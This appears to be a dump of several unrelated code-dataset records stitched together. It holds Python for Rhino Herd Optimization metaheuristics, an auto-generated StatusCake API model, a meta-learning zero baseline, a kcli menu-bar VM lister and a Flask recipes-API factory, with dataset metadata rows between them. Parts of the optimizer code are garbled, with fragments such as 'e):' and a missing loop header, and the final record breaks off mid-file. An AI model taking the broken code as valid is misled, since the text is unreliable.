parameter - default = 2831 > 0 self.r = r # default = 0.04 self.A = A # the area of each grid cell - default = 1 def train(self): pop = [self.create_solution() for _ in range(self.pop_size)] g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB) pop_size = self.pop_size # Epoch loop for epoch in range(self.epoch): pop_new = deepcopy(pop) pos_list = array([item[self.ID_POS] for item in pop]) fit_list = array([item[self.ID_FIT] for item in pop]) fx_list = deepcopy(fit_list) pos_center = mean(pos_list, axis=0) ## Calculate the fx for each individual for i in range(0, pop_size): # Eq. 1 exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a , 2.0/self.c ) fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c)) fx_list[i] = fx # print(fx_list) # Eq. 7 sum_temp = zeros(self.problem_size) for i in range(0, pop_size): sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS] * pop[i][self.ID_FIT]) sum_temp = self.A * sum_temp for i in range(0, pop_size): s_x = fx_list[i] * (1 + pop[i][self.ID_POS]/pop[i][self.ID_FIT]) / sum_temp if uniform() <= 0.5: x_new = pop[i][self.ID_POS] - uniform() * dot(s_x, pop[i][self.ID_POS]) else: x_new = pop[i][self.ID_POS] + uniform() * dot(s_x, pop[i][self.ID_POS]) x_new = self.amend_position_faster(x_new) fit = self.get_fitness_position(x_new) if fit < pop[i][self.ID_FIT]: pop_new[i] = [x_new, fit] if epoch % 100 == 0: pop_size = self.pop_size pop_new = sorted(pop_new, key=lambda item: item[self.ID_FIT]) pop = deepcopy(pop_new[:pop_size]) else: pop_size = pop_size + int(self.r * pop_size) n_new = pop_size - len(pop) for i in range(0, n_new): pop_new.extend([self.create_solution()]) pop = deepcopy(pop_new) g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best) self.loss_train.append(g_best[self.ID_FIT]) if self.verbose: print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT])) self.solution = g_best return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train class LevyRHO(BaseRHO): """ My modified version of: Rhino Herd Optimization (RH) (A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior) Notes: + Change the flow of algorithm + Uses normal in equation instead of uniform + Uses levy-flight instead of uniform-equation """ def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1): BaseRHO.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size, c, a, r, A) def train(self): pop = [self.create_solution(minmax=0) for _ in range(self.pop_size)] g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB) pop_size = self.pop_size # Epoch loop for epoch in range(self.epoch): pop_new = deepcopy(pop) pos_list = array([item[self.ID_POS] for item in pop]) pos_center = mean(pos_list, axis=0) fx_list = zeros(pop_size) ## Calculate the fx for each individual for i in range(0, pop_size): # Eq. 1 exp_component = -1 * power( norm(pop[i][self.ID_POS] - pos_center) / self.a , 2.0/self.c ) fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c)) fx_list[i] = fx #print(fx_list) # Eq. 7 sum_temp = zeros(self.problem_size) for i in range(0, self.pop_size): sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS] / pop[i][self.ID_FIT] + self.EPSILON) sum_temp = self.A * sum_temp for i in range(0, pop_size): s_x = fx_list[i] * (1 + pop[i][self.ID_FIT] * pop[i][self.ID_POS]) / sum_temp if uniform() < 0.5: x_new = pop[i][self.ID_POS] - normal() * dot(s_x, pop[i][self.ID_POS]) else: x_new = self.levy_flight(epoch+1, pop[i][self.ID_POS], g_best[self.ID_POS]) x_new = self.amend_position_faster(x_new) fit = self.get_fitness_position(x_new) if fit < pop[i][self.ID_FIT]: pop_new[i] = [x_new, fit] if epoch % 100 == 0: pop_size = self.pop_size pop_new = sorted(pop_new, key=lambda item: item[self.ID_FIT]) pop = deepcopy(pop_new[:pop_size]) else: pop_size = pop_size + int(self.r * pop_size) n_new = pop_size - len(pop) for i in range(0, n_new): pop_new.extend([self.create_solution()]) pop = deepcopy(pop_new) ## Make sure the population does not have duplicates. new_set = set() for idx, obj in enumerate(pop): if tuple(obj[self.ID_POS].tolist()) in new_set: pop[idx] = self.create_solution() else: new_set.add(tuple(obj[self.ID_POS].tolist())) g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best) self.loss_train.append(g_best[self.ID_FIT]) if self.verbose: print("> Epoch: {}, Pop Size: {}, Best Fit: {}".format(epoch+1, pop_size, g_best[self.ID_FIT])) self.solution = g_best return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
45.561983
112
0.519137
from numpy.random import uniform, normal from numpy.linalg import norm from numpy import exp, power, pi, zeros, array, mean, ones, dot from math import gamma from copy import deepcopy from mealpy.root import Root class OriginalRHO(Root): def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1): Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose) self.epoch = epoch self.pop_size = pop_size self.c = c self.a = a self.r = r self.A = A def train(self): pop = [self.create_solution() for _ in range(self.pop_size)] g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB) for epoch in range(self.epoch): pos_list = array([item[self.ID_POS] for item in pop]) fit_list = array([item[self.ID_FIT] for item in pop]) fx_list = deepcopy(fit_list) pos_center = mean(pos_list, axis=0) range(0, self.pop_size): exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a, 2.0 / self.c) fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c)) fx_list[i] = fx s_component = ones(self.problem_size) for j in range(0, self.problem_size): sum_temp = 0 for i in range(0, self.pop_size): sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS][j] / (self.EPSILON + pop[i][self.ID_FIT])) s_component[j] = self.A * sum_temp for i in range(0, self.pop_size): x_new = pop[i][self.ID_POS] for j in range(0, self.problem_size): s_x = fx_list[i] * (1 + pop[i][self.ID_FIT] * pop[i][self.ID_POS][j]) / s_component[j] if uniform() <= 0.5: x_new[j] = pop[i][self.ID_POS][j] - uniform() * s_x * pop[i][self.ID_POS][j] else: x_new[j] = pop[i][self.ID_POS][j] + uniform() * s_x * pop[i][self.ID_POS][j] x_new = self.amend_position_faster(x_new) fit = self.get_fitness_position(x_new) if fit < pop[i][self.ID_FIT]: pop[i] = [x_new, fit] g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best) self.loss_train.append(g_best[self.ID_FIT]) if self.verbose: print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT])) self.solution = g_best return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train class BaseRHO(Root): def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1): Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose) self.epoch = epoch self.pop_size = pop_size self.c = c self.a = a self.r = r self.A = A def train(self): pop = [self.create_solution() for _ in range(self.pop_size)] g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB) pop_size = self.pop_size for epoch in range(self.epoch): pop_new = deepcopy(pop) pos_list = array([item[self.ID_POS] for item in pop]) fit_list = array([item[self.ID_FIT] for item in pop]) fx_list = deepcopy(fit_list) pos_center = mean(pos_list, axis=0) e): exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a , 2.0/self.c ) fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c)) fx_list[i] = fx sum_temp = zeros(self.problem_size) for i in range(0, pop_size): sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS] * pop[i][self.ID_FIT]) sum_temp = self.A * sum_temp for i in range(0, pop_size): s_x = fx_list[i] * (1 + pop[i][self.ID_POS]/pop[i][self.ID_FIT]) / sum_temp if uniform() <= 0.5: x_new = pop[i][self.ID_POS] - uniform() * dot(s_x, pop[i][self.ID_POS]) else: x_new = pop[i][self.ID_POS] + uniform() * dot(s_x, pop[i][self.ID_POS]) x_new = self.amend_position_faster(x_new) fit = self.get_fitness_position(x_new) if fit < pop[i][self.ID_FIT]: pop_new[i] = [x_new, fit] if epoch % 100 == 0: pop_size = self.pop_size pop_new = sorted(pop_new, key=lambda item: item[self.ID_FIT]) pop = deepcopy(pop_new[:pop_size]) else: pop_size = pop_size + int(self.r * pop_size) n_new = pop_size - len(pop) for i in range(0, n_new): pop_new.extend([self.create_solution()]) pop = deepcopy(pop_new) g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best) self.loss_train.append(g_best[self.ID_FIT]) if self.verbose: print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT])) self.solution = g_best return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train class LevyRHO(BaseRHO): def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1): BaseRHO.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size, c, a, r, A) def train(self): pop = [self.create_solution(minmax=0) for _ in range(self.pop_size)] g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB) pop_size = self.pop_size for epoch in range(self.epoch): pop_new = deepcopy(pop) pos_list = array([item[self.ID_POS] for item in pop]) pos_center = mean(pos_list, axis=0) fx_list = zeros(pop_size) e): exp_component = -1 * power( norm(pop[i][self.ID_POS] - pos_center) / self.a , 2.0/self.c ) fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c)) fx_list[i] = fx sum_temp = zeros(self.problem_size) for i in range(0, self.pop_size): sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS] / pop[i][self.ID_FIT] + self.EPSILON) sum_temp = self.A * sum_temp for i in range(0, pop_size): s_x = fx_list[i] * (1 + pop[i][self.ID_FIT] * pop[i][self.ID_POS]) / sum_temp if uniform() < 0.5: x_new = pop[i][self.ID_POS] - normal() * dot(s_x, pop[i][self.ID_POS]) else: x_new = self.levy_flight(epoch+1, pop[i][self.ID_POS], g_best[self.ID_POS]) x_new = self.amend_position_faster(x_new) fit = self.get_fitness_position(x_new) if fit < pop[i][self.ID_FIT]: pop_new[i] = [x_new, fit] if epoch % 100 == 0: pop_size = self.pop_size pop_new = sorted(pop_new, key=lambda item: item[self.ID_FIT]) pop = deepcopy(pop_new[:pop_size]) else: pop_size = pop_size + int(self.r * pop_size) n_new = pop_size - len(pop) for i in range(0, n_new): pop_new.extend([self.create_solution()]) pop = deepcopy(pop_new) j in enumerate(pop): if tuple(obj[self.ID_POS].tolist()) in new_set: pop[idx] = self.create_solution() else: new_set.add(tuple(obj[self.ID_POS].tolist())) g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best) self.loss_train.append(g_best[self.ID_FIT]) if self.verbose: print("> Epoch: {}, Pop Size: {}, Best Fit: {}".format(epoch+1, pop_size, g_best[self.ID_FIT])) self.solution = g_best return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
true
true
f728da1527fd632c7835a634ccc21648be53f1a4
13,704
py
Python
statuscake/model/monitoring_location.py
StatusCakeDev/statuscake-py
267f485e6c18a6ed6e17667ceaddfce6271ec4af
[ "MIT" ]
null
null
null
statuscake/model/monitoring_location.py
StatusCakeDev/statuscake-py
267f485e6c18a6ed6e17667ceaddfce6271ec4af
[ "MIT" ]
null
null
null
statuscake/model/monitoring_location.py
StatusCakeDev/statuscake-py
267f485e6c18a6ed6e17667ceaddfce6271ec4af
[ "MIT" ]
null
null
null
""" StatusCake API Copyright (c) 2022 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. API Version: 1.0.0-beta.3 Contact: support@statuscake.com Code generated by OpenAPI Generator (https://openapi-generator.tech); DO NOT EDIT. """ import re # noqa: F401 import sys # noqa: F401 from statuscake.model_utils import ( # noqa: F401 ApiTypeError, ModelComposed, ModelNormal, ModelSimple, cached_property, change_keys_js_to_python, convert_js_args_to_python_args, date, datetime, file_type, none_type, validate_get_composed_info, OpenApiModel ) from statuscake.exceptions import ApiAttributeError def lazy_import(): from statuscake.model.monitoring_location_status import MonitoringLocationStatus globals()['MonitoringLocationStatus'] = MonitoringLocationStatus class MonitoringLocation(ModelNormal): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. Attributes: allowed_values (dict): The key is the tuple path to the attribute and the for var_name this is (var_name,). The value is a dict with a capitalized key describing the allowed value and an allowed value. These dicts store the allowed enum values. attribute_map (dict): The key is attribute name and the value is json key in definition. discriminator_value_class_map (dict): A dict to go from the discriminator variable value to the discriminator class name. validations (dict): The key is the tuple path to the attribute and the for var_name this is (var_name,). The value is a dict that stores validations for max_length, min_length, max_items, min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum, inclusive_minimum, and regex. additional_properties_type (tuple): A tuple of classes accepted as additional properties values. """ allowed_values = { } validations = { } @cached_property def additional_properties_type(): """ This must be a method because a model may have properties that are of type self, this must run after the class is loaded """ lazy_import() return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501 _nullable = False @cached_property def openapi_types(): """ This must be a method because a model may have properties that are of type self, this must run after the class is loaded Returns openapi_types (dict): The key is attribute name and the value is attribute type. """ lazy_import() return { 'description': (str,), # noqa: E501 'region': (str,), # noqa: E501 'region_code': (str,), # noqa: E501 'status': (MonitoringLocationStatus,), # noqa: E501 'ipv4': (str,), # noqa: E501 'ipv6': (str,), # noqa: E501 } @cached_property def discriminator(): return None attribute_map = { 'description': 'description', # noqa: E501 'region': 'region', # noqa: E501 'region_code': 'region_code', # noqa: E501 'status': 'status', # noqa: E501 'ipv4': 'ipv4', # noqa: E501 'ipv6': 'ipv6', # noqa: E501 } read_only_vars = { } _composed_schemas = {} @classmethod @convert_js_args_to_python_args def _from_openapi_data(cls, description, region, region_code, status, *args, **kwargs): # noqa: E501 """MonitoringLocation - a model defined in OpenAPI Args: description (str): Server description region (str): Server region region_code (str): Server region code status (MonitoringLocationStatus): Keyword Args: _check_type (bool): if True, values for parameters in openapi_types will be type checked and a TypeError will be raised if the wrong type is input. Defaults to True _path_to_item (tuple/list): This is a list of keys or values to drill down to the model in received_data when deserializing a response _spec_property_naming (bool): True if the variable names in the input data are serialized names, as specified in the OpenAPI document. False if the variable names in the input data are pythonic names, e.g. snake case (default) _configuration (Configuration): the instance to use when deserializing a file_type parameter. If passed, type conversion is attempted If omitted no type conversion is done. _visited_composed_classes (tuple): This stores a tuple of classes that we have traveled through so that if we see that class again we will not use its discriminator again. When traveling through a discriminator, the composed schema that is is traveled through is added to this set. For example if Animal has a discriminator petType and we pass in "Dog", and the class Dog allOf includes Animal, we move through Animal once using the discriminator, and pick Dog. Then in Dog, we will make an instance of the Animal class but this time we won't travel through its discriminator because we passed in _visited_composed_classes = (Animal,) ipv4 (str): Server IPv4 address. [optional] # noqa: E501 ipv6 (str): Server IPv6 address. [optional] # noqa: E501 """ _check_type = kwargs.pop('_check_type', True) _spec_property_naming = kwargs.pop('_spec_property_naming', False) _path_to_item = kwargs.pop('_path_to_item', ()) _configuration = kwargs.pop('_configuration', None) _visited_composed_classes = kwargs.pop('_visited_composed_classes', ()) self = super(OpenApiModel, cls).__new__(cls) if args: raise ApiTypeError( "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % ( args, self.__class__.__name__, ), path_to_item=_path_to_item, valid_classes=(self.__class__,), ) self._data_store = {} self._check_type = _check_type self._spec_property_naming = _spec_property_naming self._path_to_item = _path_to_item self._configuration = _configuration self._visited_composed_classes = _visited_composed_classes + (self.__class__,) self.description = description self.region = region self.region_code = region_code self.status = status for var_name, var_value in kwargs.items(): if var_name not in self.attribute_map and \ self._configuration is not None and \ self._configuration.discard_unknown_keys and \ self.additional_properties_type is None: # discard variable. continue setattr(self, var_name, var_value) return self required_properties = set([ '_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', ]) @convert_js_args_to_python_args def __init__(self, description, region, region_code, status, *args, **kwargs): # noqa: E501 """MonitoringLocation - a model defined in OpenAPI Args: description (str): Server description region (str): Server region region_code (str): Server region code status (MonitoringLocationStatus): Keyword Args: _check_type (bool): if True, values for parameters in openapi_types will be type checked and a TypeError will be raised if the wrong type is input. Defaults to True _path_to_item (tuple/list): This is a list of keys or values to drill down to the model in received_data when deserializing a response _spec_property_naming (bool): True if the variable names in the input data are serialized names, as specified in the OpenAPI document. False if the variable names in the input data are pythonic names, e.g. snake case (default) _configuration (Configuration): the instance to use when deserializing a file_type parameter. If passed, type conversion is attempted If omitted no type conversion is done. _visited_composed_classes (tuple): This stores a tuple of classes that we have traveled through so that if we see that class again we will not use its discriminator again. When traveling through a discriminator, the composed schema that is is traveled through is added to this set. For example if Animal has a discriminator petType and we pass in "Dog", and the class Dog allOf includes Animal, we move through Animal once using the discriminator, and pick Dog. Then in Dog, we will make an instance of the Animal class but this time we won't travel through its discriminator because we passed in _visited_composed_classes = (Animal,) ipv4 (str): Server IPv4 address. [optional] # noqa: E501 ipv6 (str): Server IPv6 address. [optional] # noqa: E501 """ _check_type = kwargs.pop('_check_type', True) _spec_property_naming = kwargs.pop('_spec_property_naming', False) _path_to_item = kwargs.pop('_path_to_item', ()) _configuration = kwargs.pop('_configuration', None) _visited_composed_classes = kwargs.pop('_visited_composed_classes', ()) if args: raise ApiTypeError( "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % ( args, self.__class__.__name__, ), path_to_item=_path_to_item, valid_classes=(self.__class__,), ) self._data_store = {} self._check_type = _check_type self._spec_property_naming = _spec_property_naming self._path_to_item = _path_to_item self._configuration = _configuration self._visited_composed_classes = _visited_composed_classes + (self.__class__,) self.description = description self.region = region self.region_code = region_code self.status = status for var_name, var_value in kwargs.items(): if var_name not in self.attribute_map and \ self._configuration is not None and \ self._configuration.discard_unknown_keys and \ self.additional_properties_type is None: # discard variable. continue setattr(self, var_name, var_value) if var_name in self.read_only_vars: raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate " f"class with read only attributes.")
43.782748
121
0.587858
import re import sys from statuscake.model_utils import ( ApiTypeError, ModelComposed, ModelNormal, ModelSimple, cached_property, change_keys_js_to_python, convert_js_args_to_python_args, date, datetime, file_type, none_type, validate_get_composed_info, OpenApiModel ) from statuscake.exceptions import ApiAttributeError def lazy_import(): from statuscake.model.monitoring_location_status import MonitoringLocationStatus globals()['MonitoringLocationStatus'] = MonitoringLocationStatus class MonitoringLocation(ModelNormal): allowed_values = { } validations = { } @cached_property def additional_properties_type(): lazy_import() return (bool, date, datetime, dict, float, int, list, str, none_type,) _nullable = False @cached_property def openapi_types(): lazy_import() return { 'description': (str,), 'region': (str,), 'region_code': (str,), 'status': (MonitoringLocationStatus,), 'ipv4': (str,), 'ipv6': (str,), } @cached_property def discriminator(): return None attribute_map = { 'description': 'description', 'region': 'region', 'region_code': 'region_code', 'status': 'status', 'ipv4': 'ipv4', 'ipv6': 'ipv6', } read_only_vars = { } _composed_schemas = {} @classmethod @convert_js_args_to_python_args def _from_openapi_data(cls, description, region, region_code, status, *args, **kwargs): _check_type = kwargs.pop('_check_type', True) _spec_property_naming = kwargs.pop('_spec_property_naming', False) _path_to_item = kwargs.pop('_path_to_item', ()) _configuration = kwargs.pop('_configuration', None) _visited_composed_classes = kwargs.pop('_visited_composed_classes', ()) self = super(OpenApiModel, cls).__new__(cls) if args: raise ApiTypeError( "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % ( args, self.__class__.__name__, ), path_to_item=_path_to_item, valid_classes=(self.__class__,), ) self._data_store = {} self._check_type = _check_type self._spec_property_naming = _spec_property_naming self._path_to_item = _path_to_item self._configuration = _configuration self._visited_composed_classes = _visited_composed_classes + (self.__class__,) self.description = description self.region = region self.region_code = region_code self.status = status for var_name, var_value in kwargs.items(): if var_name not in self.attribute_map and \ self._configuration is not None and \ self._configuration.discard_unknown_keys and \ self.additional_properties_type is None: continue setattr(self, var_name, var_value) return self required_properties = set([ '_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', ]) @convert_js_args_to_python_args def __init__(self, description, region, region_code, status, *args, **kwargs): _check_type = kwargs.pop('_check_type', True) _spec_property_naming = kwargs.pop('_spec_property_naming', False) _path_to_item = kwargs.pop('_path_to_item', ()) _configuration = kwargs.pop('_configuration', None) _visited_composed_classes = kwargs.pop('_visited_composed_classes', ()) if args: raise ApiTypeError( "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % ( args, self.__class__.__name__, ), path_to_item=_path_to_item, valid_classes=(self.__class__,), ) self._data_store = {} self._check_type = _check_type self._spec_property_naming = _spec_property_naming self._path_to_item = _path_to_item self._configuration = _configuration self._visited_composed_classes = _visited_composed_classes + (self.__class__,) self.description = description self.region = region self.region_code = region_code self.status = status for var_name, var_value in kwargs.items(): if var_name not in self.attribute_map and \ self._configuration is not None and \ self._configuration.discard_unknown_keys and \ self.additional_properties_type is None: continue setattr(self, var_name, var_value) if var_name in self.read_only_vars: raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate " f"class with read only attributes.")
true
true
f728dc2a946afc1b5d06e688400b56b32399c964
1,251
py
Python
maml_zoo/baselines/zero_baseline.py
intel-isl/MetaLearningTradeoffs
bb1b849742a959310f3b9b630bb76ae3509a5d4a
[ "MIT" ]
2
2021-04-26T15:09:46.000Z
2021-04-28T11:58:28.000Z
maml_zoo/baselines/zero_baseline.py
intel-isl/MetaLearningTradeoffs
bb1b849742a959310f3b9b630bb76ae3509a5d4a
[ "MIT" ]
null
null
null
maml_zoo/baselines/zero_baseline.py
intel-isl/MetaLearningTradeoffs
bb1b849742a959310f3b9b630bb76ae3509a5d4a
[ "MIT" ]
null
null
null
from maml_zoo.baselines.base import Baseline import numpy as np class ZeroBaseline(Baseline): """ Dummy baseline """ def __init__(self): super(ZeroBaseline, self).__init__() def get_param_values(self, **kwargs): """ Returns the parameter values of the baseline object Returns: (None): coefficients of the baseline """ return None def set_param_values(self, value, **kwargs): """ Sets the parameter values of the baseline object Args: value (None): coefficients of the baseline """ pass def fit(self, paths, **kwargs): """ Improves the quality of zeroes output by baseline Args: paths: list of paths """ pass def predict(self, path): """ Produces some zeroes Args: path (dict): dict of lists/numpy array containing trajectory / path information such as "observations", "rewards", ... Returns: (np.ndarray): numpy array of the same length as paths["observations"] specifying the reward baseline """ return np.zeros_like(path["rewards"])
22.745455
113
0.56275
from maml_zoo.baselines.base import Baseline import numpy as np class ZeroBaseline(Baseline): def __init__(self): super(ZeroBaseline, self).__init__() def get_param_values(self, **kwargs): return None def set_param_values(self, value, **kwargs): pass def fit(self, paths, **kwargs): pass def predict(self, path): return np.zeros_like(path["rewards"])
true
true
f728dd857698ca686c726ad6857773bcc957646e
1,204
py
Python
extras/kclibar.20s.py
flloreda/kcli
0f0ee3bad058882dd5db1faa257e05270933cc93
[ "Apache-2.0" ]
null
null
null
extras/kclibar.20s.py
flloreda/kcli
0f0ee3bad058882dd5db1faa257e05270933cc93
[ "Apache-2.0" ]
null
null
null
extras/kclibar.20s.py
flloreda/kcli
0f0ee3bad058882dd5db1faa257e05270933cc93
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- # <bitbar.title>kcli list</bitbar.title> # <bitbar.version>v1.0</bitbar.version> # <bitbar.author>Karim Boumedhel</bitbar.author> # <bitbar.author.github>karmab</bitbar.author.github> # <bitbar.desc>Lists running vms using kcli</bitbar.desc> # <bitbar.image>https://raw.githubusercontent.com/karmab/kcli/master/kcli-small.png</bitbar.image> # <bitbar.abouturl>https://github.com/karmab/kcli</bitbar.abouturl> import sys try: from kvirt.config import Kconfig except: warning = u"\u26A0" warning = warning.encode('utf-8') print("%s\n" % warning) print("---\n") print("Kcli could not be found in your path. Is it installed?") sys.exit(1) config = Kconfig(quiet=True) k = config.k vms = k.list() running = [vm[0] for vm in vms if vm[1] == 'up'] off = [vm[0] for vm in vms if vm[1] == 'down'] print("Kcli %s/%s Running" % (len(running), len(vms))) print('---') for vm in sorted(running): print("%s| color=green" % vm) # print("%s| color=green bash=kcli param1=ssh param2=%s" % (vm, vm)) print('---') for vm in sorted(off): print(vm) # print("%s| terminal=false refresh=true bash=kcli param1=start param2=%s" % (vm, vm))
32.540541
98
0.657807
import sys try: from kvirt.config import Kconfig except: warning = u"\u26A0" warning = warning.encode('utf-8') print("%s\n" % warning) print("---\n") print("Kcli could not be found in your path. Is it installed?") sys.exit(1) config = Kconfig(quiet=True) k = config.k vms = k.list() running = [vm[0] for vm in vms if vm[1] == 'up'] off = [vm[0] for vm in vms if vm[1] == 'down'] print("Kcli %s/%s Running" % (len(running), len(vms))) print('---') for vm in sorted(running): print("%s| color=green" % vm) print('---') for vm in sorted(off): print(vm)
true
true
f728deb54d5e8380553f699e1124d7ca227b1e24
2,736
py
Python
app/__init__.py
pndemo/yummy-recipes-api
ae6729bd1c886ce9872d83488a6eaa99e92be513
[ "MIT" ]
null
null
null
app/__init__.py
pndemo/yummy-recipes-api
ae6729bd1c886ce9872d83488a6eaa99e92be513
[ "MIT" ]
3
2019-12-20T23:17:20.000Z
2022-03-21T22:16:25.000Z
app/__init__.py
pndemo/yummy-recipes-api
ae6729bd1c886ce9872d83488a6eaa99e92be513
[ "MIT" ]
1
2017-12-13T12:44:11.000Z
2017-12-13T12:44:11.000Z
""" Initial application specifications """ from flask import Flask, redirect from flask_sqlalchemy import SQLAlchemy from instance.config import app_config from flasgger import Swagger # pylint: disable=C0103 db = SQLAlchemy() def create_app(config_name): """ Function for creating application depending on configuration """ app = Flask(__name__, instance_relative_config=True) app.config.from_object(app_config[config_name]) app.config['SWAGGER'] = { "swagger": "2.0", "title": "Yummy Recipes API", "info": { "title": "Yummy Recipes API", "description": "This app enables you to access Yummy Recipes resources, a platform \ for users to keep track of their awesome recipes and share with others if \ they so wish. The API functionalities include: creation of new user \ accounts, user login, password reset, creation of new recipe categories, \ viewing of recipe categories, updating of recipe categories, deletion of \ recipe categories, creation of new recipes, viewing of recipes, updating of \ recipes and deletion of recipes.", "contact": { "responsibleOrganization": "Yummy Recipes Inc.", "responsibleDeveloper": "Paul Ndemo Oroko", "url": "https://github.com/pndemo/yummy-recipes-api", } }, "schemes": ["http", "https"], 'securityDefinitions': { "Bearer": { "type": "apiKey", "name": "Authorization", "in": "header" } } } Swagger(app) db.init_app(app) def index(): """ Yummy Recipes API home page """ return redirect('/apidocs') from app.v1.views import auth_blueprint app.register_blueprint(auth_blueprint) from app.v1.views.category_views import category_view, category_specific_view, \ category_search_view app.add_url_rule('/', view_func=index) app.add_url_rule('/api/v1/category/', view_func=category_view) app.add_url_rule('/api/v1/category/<int:category_id>', view_func=category_specific_view) app.add_url_rule('/api/v1/category/search', view_func=category_search_view) from app.v1.views.recipe_views import recipe_view, recipe_specific_view, recipe_search_view app.add_url_rule('/api/v1/recipe/<int:category_id>/', view_func=recipe_view) app.add_url_rule('/api/v1/recipe/<int:category_id>/<int:recipe_id>', view_func= \ recipe_specific_view) app.add_url_rule('/api/v1/recipe/<int:category_id>/search', view_func=recipe_search_view) return app
38.535211
97
0.640351
from flask import Flask, redirect from flask_sqlalchemy import SQLAlchemy from instance.config import app_config from flasgger import Swagger db = SQLAlchemy() def create_app(config_name): app = Flask(__name__, instance_relative_config=True) app.config.from_object(app_config[config_name]) app.config['SWAGGER'] = { "swagger": "2.0", "title": "Yummy Recipes API", "info": { "title": "Yummy Recipes API", "description": "This app enables you to access Yummy Recipes resources, a platform \ for users to keep track of their awesome recipes and share with others if \ they so wish. The API functionalities include: creation of new user \ accounts, user login, password reset, creation of new recipe categories, \ viewing of recipe categories, updating of recipe categories, deletion of \ recipe categories, creation of new recipes, viewing of recipes, updating of \ recipes and deletion of recipes.", "contact": { "responsibleOrganization": "Yummy Recipes Inc.", "responsibleDeveloper": "Paul Ndemo Oroko", "url": "https://github.com/pndemo/yummy-recipes-api", } }, "schemes": ["http", "https"], 'securityDefinitions': { "Bearer": { "type": "apiKey", "name": "Authorization", "in": "header" } } } Swagger(app) db.init_app(app) def index(): return redirect('/apidocs') from app.v1.views import auth_blueprint app.register_blueprint(auth_blueprint) from app.v1.views.category_views import category_view, category_specific_view, \ category_search_view app.add_url_rule('/', view_func=index) app.add_url_rule('/api/v1/category/', view_func=category_view) app.add_url_rule('/api/v1/category/<int:category_id>', view_func=category_specific_view) 